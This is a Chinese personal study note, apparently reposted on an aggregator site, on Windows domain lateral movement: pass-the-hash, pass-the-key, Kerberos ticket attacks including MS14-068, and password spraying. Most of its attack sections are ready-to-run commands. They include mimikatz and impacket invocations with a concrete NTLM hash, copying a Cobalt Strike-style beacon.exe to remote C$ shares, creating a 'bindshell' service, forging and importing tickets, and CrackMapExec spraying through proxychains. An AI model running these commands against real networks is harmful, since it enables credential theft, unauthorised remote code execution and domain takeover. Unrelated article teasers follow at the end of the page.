7、内网安全-横向移动PTH哈希PTT票据PTK密匙Kerberos密码喷射

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-PTH-Mimikatz&NTLM

1、Mimikatz

2、impacket-at&ps&wmi&smb

二、域横向移动-PTK-Mimikatz&AES256

三、域横向移动-PTT-漏洞&Kekeo&Ticket

 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

四、Linux系统+Proxychains+CrackMapExec-密码喷射


一、域横向移动-PTH-Mimikatz&NTLM

PTH=Pass The Hash,通过密码散列值(通常是NTLM Hash)来进行攻击。
在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。
因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方
法登录到内网主机的其他计算机。另外注意在window Server 2012 R2之前使用到的密
码散列值是LM、NTLM,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

1、Mimikatz

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
net use \\192.168.3.32/c$
copy beacon.exe \\192.168.3.32\c$
sc \\sqlserver create bindshell binpath="c:\4444.exe"
sc \\sqlserver start bindahell

2、impacket-at&ps&wmi&smb

Psexec -hashes :NTLM值 域名/域用户@域内ip地址
smbexec -hashes :NTLM值 域名/域用户@域内ip地址
wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

二、域横向移动-PTK-Mimikatz&AES256

PTK=Pass The Key,当系统安装了KB2871997补丁且禁用了NTLM的时候,
那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限。

mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 

三、域横向移动-PTT-漏洞&Kekeo&Ticket

资源地址:

https://github.com/abatchy17/windowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases

 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

MS14-068是密钥分发中心(KDC)服务中的windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证

注意:成功不成功看DC域控漏洞补丁打没打

获取SID值:shell whoami/user
生成票据文件:shell ms14-068.exe -u webadmin@god.org -s
s-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
清除票据连接:
shell klist purge
内存导入票据:
mimikatz kerberos:ptc TGT_webadmin@god.org.ccache
连接目标上线:
shell dir \\OWA2010CN-GOD\c$
shell net use \\OWA2010CN-GOD\c$
copy beacon.exe \\OWA2010CN-GOD/c$
sc \\OWA2010CN-GOD create bindshell binpath= "c:\beacon.exe"
sc \\OWA2010CN-GOD start bindshell

2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,
我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗
缺点:票据是有有效期的,所以如果当前主机在连接过域控的话,有效期内可利用。

注意:成功率看ntlm哈希值的正确性

生成票据:shell kekeo "tgt::ask /user:Administrator /domain god.org /ntim:ocef208c6485269c20db2cad21734fe7" "exit"
导入票据: shell kekeo "kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi " "exit"
查看票据:shell klist
利用票据连接:shell dir \\owa2010cn-god\c$

3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

导出票据:
mimikatz sekurlsa::tickets /export导入票据:
mimikatz kerberos::ptt C:
\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbishell klist

四、Linux系统+Proxychains+CrackMapExec-密码喷射

CrackMapExec
https://github.com/Porchetta Industries/CrackMapExec
官方手册:https://mpgn.gitbook.io/crackmapexec/
部分案例:https://www.freebuf.com/sectool/184573.html

下载对应release,建立socks连接,设置socks代理,配置规则,调用!
Linux系统代理工具: Proxychains使用
安装使用:
https://blog.csdn.net/qq_53086690/article/details/121779832
代理配置:Proxychains.conf
代理调用:Proxychains 命令                 

#域用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c 
#本地用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --1ocal-auth    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/687318.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

适用于 Windows 的 12 个最佳 PDF 编辑器

PDF文档的普遍存在按理说,PDF文档的可读性和可移植性受到专业文档的青睐。 然而,PDF格式的可食用性是一大缺陷。幸运的是,各种 PDF 编辑工具和软件使 PDF 的编辑变得更加容易,这篇文章旨在帮助我们的读者找到其中最好的工具和软件…

已解决ModuleNotFoundError: No module named ‘paddle‘异常的正确解决方法,亲测有效!!!

已解决ModuleNotFoundError: No module named paddle异常的正确解决方法,亲测有效!!! 文章目录 问题分析 报错原因 解决思路 解决方法 总结 在人工智能和深度学习领域,PaddlePaddle是由百度发起的开源平台&#…

CSS的注释:以“ /* ”开头,以“ */ ”结尾

CSS的注释:以“ /* ”开头,以“*/”结尾 CSS的注释: 以“ /* ”开头,以“ */ ”结尾 在CSS中,注释是一种非常重要的工具,它们可以帮助开发者记录代码的功能、用法或其他重要信息。这些信息对于理解代码、维护代码以及与他人合作都…

JS进阶——垃圾回收机制以及算法

版权声明 本文章来源于B站上的某马课程,由本人整理,仅供学习交流使用。如涉及侵权问题,请立即与本人联系,本人将积极配合删除相关内容。感谢理解和支持,本人致力于维护原创作品的权益,共同营造一个尊重知识…

2024前端面试准备之CSS篇(二)

1. 什么是伪类和伪元素 伪类(Pseudo-class): 伪类是选择器的一种,用于选择特定状态或条件下的元素。它们以冒号(:)开头,用于向选择器添加额外的特定条件。例如,:hover伪类用于选择鼠标悬停在元素上的状态,:nth-child(n)伪类用于选择父元素下的第n个子元素等。 伪元素(…

java 中 mongodb的各种操作 模糊查询 精确查询 等

本意是想查查mongo数据库的int类型的like怎么查,但是好像没 解决这个问题。 精确查询;模糊查询;分页查询,每页多少:按某个字段排序(或升或降):查询数量:大于,小于,等于&…

机器学习代码问题总结

一、fit()、tansform()、fit_transform()区别 fit(): Method calculates the parameters μ and σ and saves them as internal objects.解释:简单来说,就是求得训练集X的均值,方差,最大值,最小值,这些训练集X固有的…

IDM6.42.3下载器(Internet Download Manager)俄罗斯大神版,

IDM下载器(Internet Download Manager)俄罗斯大神版,目前最新版是 6.42.3。 Internet Download Manager(简称:IDM)是一款来自国外的非常优秀网络资源高速下载及管理工具,该软件同时是一款收费共…

计算机毕业设计SSM基于的高校学习资源共享系统

项目运行 环境配置: Jdk1.8 Tomcat7.0 Mysql HBuilderX(Webstorm也行) Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。 项目技术: vue mybatis Maven mysql5.7或8.0等等组成,B…

电子元器件基础6---三极管

了解了二极管后,接下来就是三极管了。二极管是一个PN结,而三极管是两个PN结构成。 一、三极管概念 三极管,全称应为半导体三极管,也称双极型晶体管、晶体三极管,是一种控制电流的半导体器件。其作用是把微弱信号放大成幅度值较大的电信号,也用作无触点开关。 三极管是半…

php数据类型以及运算符、判断条件

php数据类型以及运算符 1. php数据类型2. 使用举例3. 运算符4. 判断条件if else elseif 1. php数据类型 包括 String(字符串)、Integer(整型)、Float(浮点型)、Boolean(布尔型)、Array(数组)、Object(对象)、NULL(空值) 2. 使用举例 1.字符串 2.整型 3.浮点型 4.布尔型 5.数组…

出境游确实在恢复

新加坡开放中国大陆游客免签,我坦白承认,这是我之前未曾预料的。 那么春节期间,朋友圈里见证了市中心的蜂拥盛景,很多在坡多年的朋友说,在新加坡多年,从未见过如此拥挤的人群,甚至非常担心会出现…

代码随想录刷题笔记 DAY 28 | 复原 IP 地址 No.93 | 子集 No.78 | 子集 II No.90

文章目录 Day 2801. 复原 IP 地址(No. 93)1.1 题目1.2 笔记1.3 代码 02. 子集(No. 78)2.1 题目2.2 笔记2.3 代码 03. 子集 II(No. 90)3.1 题目3.2 笔记3.3 代码 Day 28 01. 复原 IP 地址(No. 9…

Android studio:错误: 需要常量表达式

Android studio:错误: 需要常量表达式 将一个项目作为library,通过import Moudle导入一个新项目引用时,爆出这个错误:需要常量表达式,定位到switch。于是百度一下,解决方法为把switch case,改成…

ABC341A-D题解

文章目录 A题目AC Code: B题目AC Code: C题目AC Code: D题目你以为这就完了? 时间复杂度分析:AC Code: E A 题目 这个没什么好说的,就先输出一个 1,再输出 n n n 个 01就大功告成…

sqlserver 内连接,左连接,右连接,全连接,自连接

在 SQL Server 中,可以使用不同类型的连接来联接两个表或视图。以下是这些连接类型的简要说明: 内连接(Inner Join): 内连接是最常用的连接类型,它返回两个表中满足连接条件的行。语法如下: SELECT t1.co…

django中事务和锁

目录 一:事务(Transactions) 二:锁 在Django中,事务和锁是数据库操作中的两个重要概念,它们用于确保数据的完整性和一致性。下面我将分别解释这两个概念在Django中的应用。 一:事务&#xff…

【软件相关】基于Alist挂载云盘到本地文件资源管理器

文章目录 0 前言1 Alist挂载云盘2 RaiDrive配置3 rclone配置 0 前言 因为最近在研究各种云盘存储影视资源的方法,无意间看到一个教程是利用软件将云盘挂载到本地的资源管理器,这样就能实现类似本地文件操作的方式来操作云盘文件,还是有点意思…

EasyRecovery软件免费版与付费版有哪些功能区别?

免费版的EasyRecovery软件在功能和恢复能力上确实存在一些限制。 首先,在数据恢复方面,免费版通常只能恢复最多1GB的数据。这意味着,如果你需要恢复的数据量超过1GB,你将需要升级到付费版才能完全恢复。 其次,免费版…

车载软件架构 —— Adaptive AUTOSAR软件架构中通信管理、诊断管理策略

车载软件架构 —— Adaptive AUTOSAR软件架构中通信管理、诊断管理策略 第四篇 我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师(Wechat:gongkenan2013)。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 本就是小人物,输了就是输了,不要在意…